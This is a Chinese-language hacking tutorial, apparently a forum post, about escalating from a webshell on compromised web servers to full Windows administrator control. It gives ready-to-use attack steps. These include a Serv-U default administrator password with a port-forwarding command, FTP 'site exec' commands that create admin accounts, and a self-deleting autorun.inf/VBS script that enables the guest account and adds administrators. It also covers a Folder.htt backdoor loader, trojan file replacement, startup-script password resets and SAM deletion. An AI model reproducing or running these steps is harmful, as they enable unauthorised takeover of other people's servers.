動網上傳漏洞,相信大家拿下不少肉雞吧,但是都是WEBSHELL,不能拿到系統許可權,要如何拿到系統許可權呢?這正是我們這次要討論的內容
OK,進入我的WEBSHELL
啊哈,不錯,雙CPU,速度應該跟的上,不拿下你我怎麼甘心啊
輸入密碼,進入到裡面看看,有什麼好東西沒有,翻了下,好像也沒有什麼特別的東西,看看能不能進到其他的盤符,點了下C盤,不錯不錯,可以進去,這樣提升就大有希望了
一 serv-u提升
OK,看看他的PROGRAME裡面有些什麼程式,哦,有SERV-U,記得有次看到SERV-U有預設的使用者名稱和密碼,但是監聽的連接埠是43958,而且是只有本地才能訪問的,但是我們有連接埠轉寄工具的啊,不怕。先看看他的SERV-U的版本是多少,telnet XXX.XXX.XXX.XXX 21
顯示竟然是3.0的,唉,不得不說這個管理員真的不稱職。後來完畢後掃描了下,也只有FTP的洞沒有補。既然是這樣,我們就開始我們的提升許可權了
上傳FPIPE,連接埠轉寄工具, 圖三
在運行CMD命令裡輸入d:\wwwroot\fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把原生43598連接埠轉寄到81連接埠
然後開啟我們自己機子上的SERV-U,點Serv-U伺服器,點功能表列上的的伺服器,點建立伺服器,然後輸入IP,輸入連接埠,記得連接埠是剛剛我們轉寄的81連接埠。服務名稱隨便你喜歡,怎麼樣都行。然後是使用者名稱:LocalAdministrator 密碼:#l@$ak#.lk;0@P (密碼都是字母)
確定,然後點剛剛建的伺服器,然後就可以看到已有的使用者,自己建立一個使用者,把所有許可權加上。也不鎖定根目錄
接下來就是登陸了,登陸FTP一定要在CMD下登陸,
進入後一般命令和DOS一樣,添加使用者的時候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果對方開了3389的話,就不用我教你怎麼做了,沒開的話,建立立IPC串連,在上傳木馬或者是開啟3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=CreateObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是這樣要可以訪問到對方的根目錄。將這兩個檔案放到對方硬碟的根目錄下。當然你也可以直接執行木馬程式,還要一個木馬程式,但是語句就和最後兩句一樣,通過CMD執行木馬程式
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini,還有你的木馬或者是VBS或者是什麼,放到對方管理員最可能瀏覽的目錄下,覺得一個不夠,可以多放幾個
Folder.htt添加代碼
<OBJECT ID=”RUNIT” WIDTH=0 HEIGHT=0 TYPE=”application/x-oleobject” CODEBASE=”你的後門檔案名稱”>
</OBJECT>
但是後門和這兩個檔案必須要放到一塊,有點問題,可以結合啟動VBS,運行結束後,刪除上傳的後門.就是CODEBASE="shell.vbs".shell寫法如上
四
replace
替換法,可以替換正在執行的檔案。用這個幾乎可以馬上得到許可權,但是我沒有做過實驗,可以試下,將對方正在執行的檔案替換為和它檔案名稱一樣的,捆綁了木馬的。為什麼不直接替換木馬呢?如果替換的是關鍵程式,那不是就直接掛了?所以還是捆綁好點
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A] [/P] [/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2] [/P] [/R] [/S] [/W]
[drive1:][path1]filename 指定源檔案。
[drive2:][path2] 指定要替換檔案的
目錄。
/A 把新檔案加入目標目錄。不能和
/S 或 /U 命令列開關搭配使用。
/P 替換檔案或加入源檔案之前會先提示您
進行確認。
/R 替換隻讀檔案以及未受保護的
檔案。
/S 替換目標目錄中所有子目錄的檔案。
不能與 /A 命令選項
搭配使用。
/W 等您插入磁碟以後再運行。
/U 只會替換或更新比源檔案日期早的檔案。
不能與 /A 命令列開關搭配使用
這個命令沒有實驗過,看能不能替換不能訪問的檔案夾下的檔案,大家可以實驗下
五
指令碼
編寫一個啟動/關機指令碼設定檔scripts.ini,這個檔案名稱是固定的,不能改變。內容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
將檔案scripts.ini儲存到“C:\winnt\system32\GroupPolicy\Machine\Scripts”
A.BAT的內容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
這樣可以恢複你想要得任意使用者名稱的密碼,也可以自己增加新的使用者,但是要依賴重啟,還有就是對SYSTEM32有寫的許可權
六
SAM
如果可以訪問對方的SYSTEM32的話,刪除對方的SAM檔案,等他重啟以後就是ADMIN使用者密碼為空白
突然又有了想法,可以用REPLACE命令替換的嗎,可以把你的SAM檔案提取出來,上傳到他的任意目錄下,然後替換。不過不知道如果對SYSTEM32沒有許可權訪問的話,能不能實現替換